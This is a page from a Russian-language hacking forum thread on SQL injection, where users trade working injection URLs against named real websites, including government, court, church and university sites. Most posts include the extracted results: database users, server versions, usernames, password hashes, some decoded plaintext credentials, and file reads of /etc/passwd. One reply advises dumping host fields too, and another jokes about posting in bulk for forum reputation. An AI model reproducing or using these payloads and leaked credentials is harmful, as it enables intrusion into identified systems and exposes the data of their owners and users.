HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 195 из 1602 « Первая < 95145185 191 192 193 194 195 196 197 198 199 2052452956951195 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.09.2007, 21:33
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию
https://forum.antichat.ru/showpost.php?p=340659&postcount=1987

Цитата:
Сообщение от BlackCats  
Цитата:
http://www.mnogosearch.org/bugs/bugs.php?id=21+order+by+16
9898
https://forum.antichat.ru/showpost.php?p=465643&postcount=3174

Цитата:
Сообщение от BlackCats  
Google Page Rank 8/10
WebAlta WTR 9/10

4-ая версия..

логин+пароль:

Код:
http://www.mnogosearch.org/bugs/bugs.php?id=-1+union+select+1,2,pass,4,5,6,7,8,9,user,11,12,13,14,15,16+from+user/*
логин:
bar
хэш пасса:
948f878a52bb69d5e54fe8d04dcddfd5
Классно, можно выкладывать раз по 10, так наверное эффективнее (репы больше и т.д.) получится?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 23.09.2007, 00:36
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами: 10200612

Репутация: 168
По умолчанию
___http://kino.ukr.net/i/nw.php?t=nologo&f=&id=4897999+uNioN+seLect+concat( login,0x3a,passw),null,null,null,null+from+users+l imit+6,1/*&mid=1345
результат в исходниках страницы
version() 5.0.18
user() afisha@10.60.20.5
database() afisha
 
Ответить с цитированием

  #3  
Старый 23.09.2007, 15:05
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию
Код:
http://www.tahuichi.com.bo/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*&idioma=Ingles  tahuichi@hosting2.cotas.com.bo:5.0.27:dbtahuichi
Код HTML:
http://www.iglesia.org.bo/sitio/comisiones/comisionbase.php?id=9999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7/*  iglesia_iglesia@localhost:4.1.22-standard:iglesia_ceb
 
Ответить с цитированием

  #4  
Старый 24.09.2007, 19:27
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию
Код:
http://www.missiontech.co.nz/read_a_article.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/*
toms@localhost:5.0.41:MT_ArticlesDB
Код:
http://www.gicom.co.mz/index.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*
gicomco@localhost:4.1.22-standard:gicomco_site
Код:
http://farm.avocadolite.com/member.phtml?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),7,8/*
4.1.16-standard-log
Код:
http://www.ollin.com.mx/news_esp.php?id=-1+union+select+1,2,3,4,concat(nombre,0x3a,password,0x3a,email),6,7,8+from+usuarios/*
Joe:4050:joel@ollin.com.mx
Код:
http://www.a.com.mx/noticia.php?id=-1+union+select+1,user(),3,4,database(),6,7,8,version()/*
Код:
http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*  midiasemmascara@200.234.200.116:5.0.41--log:midiasemmascara  http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+1,concat(login,0x3a,usuario)+from+db_admusers+limit+2,1/*
Код:
http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*  papst2007@localhost:4.0.24_Debian-10sarge2-log:visitapapa  http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,user,password+from+mysql.user/*
root:706ae7350f1aa0d5
Код:
  http://www.temporeal.com.br/produtos.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*  temporeal@10.10.10.2:4.0.21-standard-log:temporeal
Код:
http://www.araucodobrasil.com.br/page.php?id=-1+union+select+1,concat(name,0x3a,login,0x3a,password,0x3a,type)+from+aglomerado_users+limit+19000/*
Код:
http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7/*&tipo=episodio&origem=Assista  http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(USER,0x71),0x71),6,7+from+mysql.user/*&tipo=episodio&origem=Assista  http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*&tipo=episodio&origem=Assista
Код:
http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13/*  http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(column_name,0x3a,table_name),10,11,12,13+from+INFORMATION_SCHEMA.COLUMNS+limit+178,1/*
Код:
http://www.rockwm.de/songdetail.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),8,9,10,11,12/*
Код:
http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/*
intranet@200.142.13.133:5.0.22-Debian_0ubuntu6.06.2-log:intranet
Код:
http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/ union/**/select/**/1,user,password,4 ,5,6+from+mysql.user+limit+1,2/*
root:4cd8bb5521e9721c
лимитом до 6,2
Код:
http://www.prrn.mpf.gov.br/noticia.php?id=-1/** / union/**/select/**/1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+159,1/*
Последний раз редактировалось Nea7; 24.09.2007 в 20:05..
 
Ответить с цитированием

  #5  
Старый 26.09.2007, 18:50
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию
Код:
http://www.edipi.com/guidasw/aziende.php?nzl=N&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version(),0x3a,database()),15,16,17,18 ,19/*
edipi_com25466@wnx-10.seeweb.it:4.0.24_Debian-10sarge1:edipi_com25466
Код:
http://wwwdoska.ru/idv.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15,16,1 7,18,19,20/*
wwwdoska_new@localhost:4.1.22-standard:wwwdoska_new
Код:
http://www.isis.or.ug/news.php?p=5&id=99999+union+select+1,concat(user(),0x3a,version(),0x3a,database( )),3,4,5,6,7,8,9/*
isis@localhost:4.1.20:isis
Код:
http://ss.mak.ac.ug/index.php?act=news&full=true&id=9999+union+select+concat(user(),0x3a,version( ),0x3a,database()),2/*
maktus1_ss@localhost:4.1.22-standard:maktus1_ss
Код:
http://www.unbs.go.ug/news.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4/*
unbsdbadmin@localhost:4.1.21:unbs_go_ug
Код:
http://www.nic.co.ug/pg.php?p=media&s=news&Id=9999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
niccou_niccou@localhost:4.1.22-standard:niccou_
 
Ответить с цитированием

  #6  
Старый 18.04.2007, 10:46
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами: 10669286

Репутация: 1942


По умолчанию
Цитата:
http://www.janetchui.net/picture.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10/*
ss
 
Ответить с цитированием

  #7  
Старый 18.04.2007, 11:32
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


Exclamation
www.dvdcdtorg.ru
Код:
http://www.dvdcdtorg.ru/?pageId=1&catId=-13+union+select+1,2,concat_ws(char(58,58),version(),database(),user()),4,5,6,7,8/*
www.mfun.ru
Код:
http://www.mfun.ru/music/melody/play.php?melodyid=-1+union+select+1,concat_ws(char(58,58),version(),database(),user()),3,4/*
www.notaryclub.ru
Есть таблица : ccforum_users
Колонки не нашел =)
Версия mysql: 5
Код:
http://notaryclub.ru/users.php?op=show&uid=-5+union+select+1,2,3,4,concat_ws(char(58,58),version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Верховный суд Российской Федерации

Имеются таблицы:
1)users:
Колонки: нашел только password
2)user:
user : password
Код:
http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,password)+using+cp1251)+from+mysql.user/*
MySQL info
Код:
http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58,58),version(),database(),user())+using+cp1251)+from+users/*
Последний раз редактировалось Isis; 18.04.2007 в 11:34..
 
Ответить с цитированием

  #8  
Старый 18.04.2007, 11:36
limpompo
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
С нами: 10897046

Репутация: 1329


По умолчанию
To Isis
Код:
http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,pa  ssword)+using+cp1251)+from+mysql.user/*
расшифровывается так:

root:root
axmet:ax
 
Ответить с цитированием

  #9  
Старый 18.04.2007, 12:18
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами: 10051477

Репутация: 136
По умолчанию
http://www.marumi-filter.ru/shop/?id=74'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1, 2/*

http://www.sexshop-romantic.ro/sex-shop/?id=-26+union+select+1,2,3/* - 3 версия(

http://www.bomdiggy.com/readColumn.php?id=-43+union+select+1,2,version(),4,5,6,7,8+from+users/*
 
Ответить с цитированием

  #10  
Старый 18.04.2007, 12:23
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию
К тем кто выкладывает скули с доступом к базе mysql, выводите не только колонки user и password, а ещё и host
 
Ответить с цитированием
Ответ
Страница 195 из 1602 « Первая < 95145185 191 192 193 194 195 196 197 198 199 2052452956951195 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.